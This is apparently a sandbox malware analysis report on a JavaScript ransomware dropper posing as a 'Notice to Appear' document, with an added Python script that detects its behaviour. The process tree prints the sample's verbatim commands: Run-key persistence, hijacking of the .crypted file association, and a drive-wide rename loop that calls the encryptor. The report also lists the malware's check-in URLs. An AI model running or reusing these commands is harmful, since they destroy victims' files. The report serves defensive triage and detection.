Analysis

max time kernel: 150s
max time network: 133s
platform: windows10_x64
resource: win10v20201028
submitted: 15-01-2021 15:50
Static task: static1

Behavioral task: behavioral1
  Sample: Notice_to_Appear_00614075.doc.js
  Resource: win7v20201028

Behavioral task: behavioral2
  Sample: Notice_to_Appear_00614075.doc.js
  Resource: win10v20201028
General

Target: Notice_to_Appear_00614075.doc.js
Size: 37KB
MD5: f84c5242741ccd7949762ca5cbb96556
SHA1: 894c726e0a3e8cf3fd98690c27f885c4aa775775
SHA256: aa5b2a6a2711cde023d91112c0574f121b4edd6c8b62409155e75d36f38b0bb6
SHA512: 5f5716fdf73bd38f28e36cf2d8dc5a8b8ec613a3665e43e5103206fb1bc9f32ad8a44c40cea9cf037f609ad33579569b86c8fd2002832d1daf63218e27feab71
Malware Config

Extracted from: C:\Users\Admin\AppData\Local\Temp\a.txt (the dropped note; see Downloads)

Identifier (also passed as the a= parameter of every URL below):
  16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB

URLs:
  http://sswboiler.com/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB
  http://bucataria-sylviei.ro/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB
  http://lifan-m.ru/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB
  http://www.czarnieckiliny.pl/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB
  http://demo3.twt.it/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB
Signatures

Blocklisted process makes network request (1 IoC)
  flow 14, PID 4712, wscript.exe
  The Network section of this report carries no captured traffic, so the destination of flow 14 is not shown here.

Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc. No process IoCs were recorded for this signature in this run.

Adds Run key to start application (2 TTPs, 2 IoCs)
  reg.exe  Key created     \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  reg.exe  Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Crypted = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a.txt"
  The Run value points at the dropped note a.txt rather than at an executable, which is consistent with re-displaying the note at each logon rather than re-running code.

Modifies registry class (7 IoCs)
  reg.exe  Key created     \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted
  reg.exe  Key created     \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell
  reg.exe  Key created     \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open
  reg.exe  Key created     \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open\command
  reg.exe  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open\command\ = "notepad.exe \"C:\\Users\\Admin\\AppData\\Local\\Temp\\a.txt\""
  reg.exe  Key created     \REGISTRY\MACHINE\SOFTWARE\Classes\.crypted
  reg.exe  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.crypted\ = "Crypted"
  Together these map the .crypted extension to the Crypted class, whose open command launches notepad.exe on a.txt, so opening any renamed file displays the note.

Suspicious use of WriteProcessMemory (18 IoCs; each pair below is listed twice in the raw report)
  PID 4712 wscript.exe wrote to memory of 3828 cmd.exe
  PID 4712 wscript.exe wrote to memory of 4020 cmd.exe
  PID 4712 wscript.exe wrote to memory of 3944 cmd.exe
  PID 4712 wscript.exe wrote to memory of 4300 cmd.exe
  PID 4712 wscript.exe wrote to memory of 4060 cmd.exe
  PID 3828 cmd.exe wrote to memory of 3104 reg.exe
  PID 4712 wscript.exe wrote to memory of 3052 cmd.exe
  PID 3944 cmd.exe wrote to memory of 4512 reg.exe
  PID 4020 cmd.exe wrote to memory of 4484 reg.exe
Processes

[depth 1] C:\Windows\system32\wscript.exe
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\Notice_to_Appear_00614075.doc.js
  - Blocklisted process makes network request
  - Suspicious use of WriteProcessMemory

  [depth 2] C:\Windows\system32\cmd.exe
    Command line: "C:\Windows\system32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"
    - Suspicious use of WriteProcessMemory

    [depth 3] C:\Windows\system32\reg.exe
      Command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"
      - Adds Run key to start application

  [depth 2] C:\Windows\system32\cmd.exe
    Command line: "C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"
    - Suspicious use of WriteProcessMemory

    [depth 3] C:\Windows\system32\reg.exe
      Command line: REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"
      - Modifies registry class

  [depth 2] C:\Windows\system32\cmd.exe
    Command line: "C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""
    - Suspicious use of WriteProcessMemory

    [depth 3] C:\Windows\system32\reg.exe
      Command line: REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""
      - Modifies registry class

  [depth 2] C:\Windows\system32\cmd.exe
    Command line: "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\AppData\Roaming\Desktop\DECRYPT.txt"

  [depth 2] C:\Windows\system32\cmd.exe
    Command line: "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\Desktop\DECRYPT.txt"

  [depth 2] C:\Windows\system32\cmd.exe
    Command line: "C:\Windows\system32\cmd.exe" /c for /r "C:\" %i in (*.zip *.rar *.r00 *.r01 *.r02 *.r03 *.7z *.tar *.gz *.gzip *.arc *.arj *.bz *.bz2 *.bza *.bzip *.bzip2 *.ice *.xls *.xlsx *.doc *.docx *.pdf *.djvu *.fb2 *.rtf *.ppt *.pptx *.pps *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.class *.py *.pl *.h *.vb *.vcproj *.vbproj *.java *.bak *.backup *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.sql *.psd *.eps *.cdr *.cpt *.indd *.dwg *.ai *.svg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.jpeg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.mov *.3gp *.flv *.mkv *.vob *.rm *.mp3 *.wav *.asf *.wma *.m3u *.midi *.ogg *.mid *.vdi *.vmdk *.vhd *.dsk *.img *.iso) do (REN "%i" "%~nxi.crypted" & call C:\Users\Admin\AppData\Local\Temp\a0.exe "%i.crypted" eshcq5kixoxv136vc35cel0lp2it1p3zz4r4)2⤵
    This loop walks the whole C:\ volume, appends .crypted to every file with a listed extension, and invokes the dropped a0.exe (see Downloads) on each renamed file with a fixed 36-character argument.
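As an added example (not part of the sandbox report, and not code from the sample), the following Python turns the three behaviours visible in the process tree above into detection logic that runs over process command lines of the kind Sysmon event 1 or EDR telemetry would record: the REG ADD into the Run key, the REG ADD writes under HKCR that bind a new extension to a handler, and the for /r rename loop. It also parses the loop to recover the targeted extension list, the appended suffix, and the path and argument of the dropped payload. The first five command lines are copied from this report's process list; the two benign lines, the tag names and the function names are constructed for the example.

```python
import re
from typing import Dict, List, Optional, Tuple

# Command lines 0-4 are copied from the process tree in this report.
# Lines 5-6 are constructed benign negatives (a read-only REG QUERY and a
# build-cleanup loop that deletes rather than renames).
SAMPLE_CMDLINES: List[str] = [
    r'"C:\Windows\system32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"',
    r'"C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"',
    r'"C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""',
    r'"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\Desktop\DECRYPT.txt"',
    r'"C:\Windows\system32\cmd.exe" /c for /r "C:\" %i in (*.zip *.rar *.r00 *.r01 *.r02 *.r03 *.7z *.tar *.gz *.gzip *.arc *.arj *.bz *.bz2 *.bza *.bzip *.bzip2 *.ice *.xls *.xlsx *.doc *.docx *.pdf *.djvu *.fb2 *.rtf *.ppt *.pptx *.pps *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.class *.py *.pl *.h *.vb *.vcproj *.vbproj *.java *.bak *.backup *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.sql *.psd *.eps *.cdr *.cpt *.indd *.dwg *.ai *.svg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.jpeg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.mov *.3gp *.flv *.mkv *.vob *.rm *.mp3 *.wav *.asf *.wma *.m3u *.midi *.ogg *.mid *.vdi *.vmdk *.vhd *.dsk *.img *.iso) do (REN "%i" "%~nxi.crypted" & call C:\Users\Admin\AppData\Local\Temp\a0.exe "%i.crypted" eshcq5kixoxv136vc35cel0lp2it1p3zz4r4)',
    r'"C:\Windows\system32\cmd.exe" /c REG QUERY "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"',
    r'"C:\Windows\system32\cmd.exe" /c for /r "C:\build" %i in (*.obj *.pdb) do del "%i"',
]

# reg add into the per-user or machine Run/RunOnce key (persistence).
RUN_KEY = re.compile(
    r'\breg(?:\.exe)?\s+add\s+"?(?:HKCU|HKEY_CURRENT_USER|HKLM|HKEY_LOCAL_MACHINE)'
    r'\\software\\microsoft\\windows\\currentversion\\run(?:once)?\b', re.I)

# reg add under HKCR that either registers a new extension (".crypted") or
# sets a class's shell\open\command handler.
EXT_HANDLER = re.compile(
    r'\breg(?:\.exe)?\s+add\s+"?(?:HKCR|HKEY_CLASSES_ROOT)\\'
    r'(\.[a-z0-9]+|[^\\"]+\\shell\\open\\command)', re.I)

# Recursive for /r loop whose body renames each hit to "<name><suffix>";
# the group captures the appended suffix.
MASS_RENAME = re.compile(r'\bfor\s+/r\b.*\bren\s+"%\w"\s+"%~nx\w(\.[^"]+)"', re.I)

# The (...) set of a for /r loop, i.e. the targeted wildcard list.
FOR_SET = re.compile(r'\bfor\s+/r\s+(?:"[^"]*"|\S+)\s+%\w\s+in\s+\(([^)]*)\)', re.I)

# "call <payload>.exe "<file>" <argument>" as used inside the loop body.
CALL_PAYLOAD = re.compile(r'\bcall\s+(\S+\.exe)\s+"[^"]*"\s+([A-Za-z0-9]+)', re.I)


def classify(cmdline: str) -> Dict[str, str]:
    """Map each matched behaviour to the evidence substring that triggered it."""
    hits: Dict[str, str] = {}
    m = RUN_KEY.search(cmdline)
    if m:
        hits["run_key_persistence"] = m.group(0)
    m = EXT_HANDLER.search(cmdline)
    if m:
        hits["file_association_hijack"] = m.group(1)
    m = MASS_RENAME.search(cmdline)
    if m:
        hits["mass_rename"] = m.group(1)
    return hits


def extract_rename_loop(cmdline: str) -> Optional[dict]:
    """For a for /r loop, recover targeted extensions, rename suffix and payload call."""
    m = FOR_SET.search(cmdline)
    if not m:
        return None
    extensions = [tok[1:] for tok in m.group(1).split() if tok.startswith("*.")]
    suffix = MASS_RENAME.search(cmdline)
    payload = CALL_PAYLOAD.search(cmdline)
    return {
        "extensions": extensions,
        "suffix": suffix.group(1) if suffix else None,
        "payload": payload.group(1) if payload else None,
        "payload_arg": payload.group(2) if payload else None,
    }


def triage(cmdlines: List[str]) -> List[Tuple[int, Dict[str, str]]]:
    """Return (index, hits) for every command line that matched at least one behaviour."""
    results: List[Tuple[int, Dict[str, str]]] = []
    for i, line in enumerate(cmdlines):
        hits = classify(line)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_CMDLINES):
        print(idx, hits)
    loop = extract_rename_loop(SAMPLE_CMDLINES[4])
    print(len(loop["extensions"]), "extensions renamed to", loop["suffix"],
          "then passed to", loop["payload"], "with", loop["payload_arg"])
```

The three rules are deliberately independent: any one of them firing from a cmd.exe child of wscript.exe is worth an alert on its own, and the rename loop rule in particular does not depend on the .crypted string, so a variant with a different suffix still matches. The benign negatives show the two false-positive traps the patterns avoid: a read-only REG QUERY against the Run key, and a recursive loop that deletes instead of renaming.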
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\Local\Temp\a.txt
  MD5: 31ff92435ec51fab9b7ba2ed4c15dd3e
  SHA1: 696a564dde590c05ad07c16357304fe1c9b25710
  SHA256: b5aec39215b6000a55dca8f51e96338deb950d5d29796eae1683acb6740cb143
  SHA512: 7066800f4473fe6937ea28e8885aded0db866a5c2c9eb1a8bb4473ea4b069cb54bd87b48f060b32cdaac884f42c0e32360999386426ba0e8752c53dbf8da39f6

C:\Users\Admin\AppData\Local\Temp\a0.exe
  MD5: aa95b86d3ba312056034964adc1e19b2
  SHA1: 4b17b2c278462245e95cafdef16fff76401ba105
  SHA256: 773f80fcae6ac4fe16fb497a23e5596dfcec643ff14967c76366d3b333f3d7b9
  SHA512: a992837759a461396ba8796ba63229e05b288e115961adec6a0730ee67d5500e923c6f9b6e5835193e09f2f15185185a28c1afd28c48ae6fa326d5bf405104e8

Memory dumps:
  memory/3052-9-0x0000000000000000-mapping.dmp
  memory/3104-8-0x0000000000000000-mapping.dmp
  memory/3828-3-0x0000000000000000-mapping.dmp
  memory/3944-5-0x0000000000000000-mapping.dmp
  memory/4020-4-0x0000000000000000-mapping.dmp
  memory/4060-7-0x0000000000000000-mapping.dmp
  memory/4300-6-0x0000000000000000-mapping.dmp
  memory/4484-12-0x0000000000000000-mapping.dmp
  memory/4512-10-0x0000000000000000-mapping.dmp
  memory/4712-2-0x000001A3A89B0000-0x000001A3A89B4000-memory.dmp (Filesize: 16KB)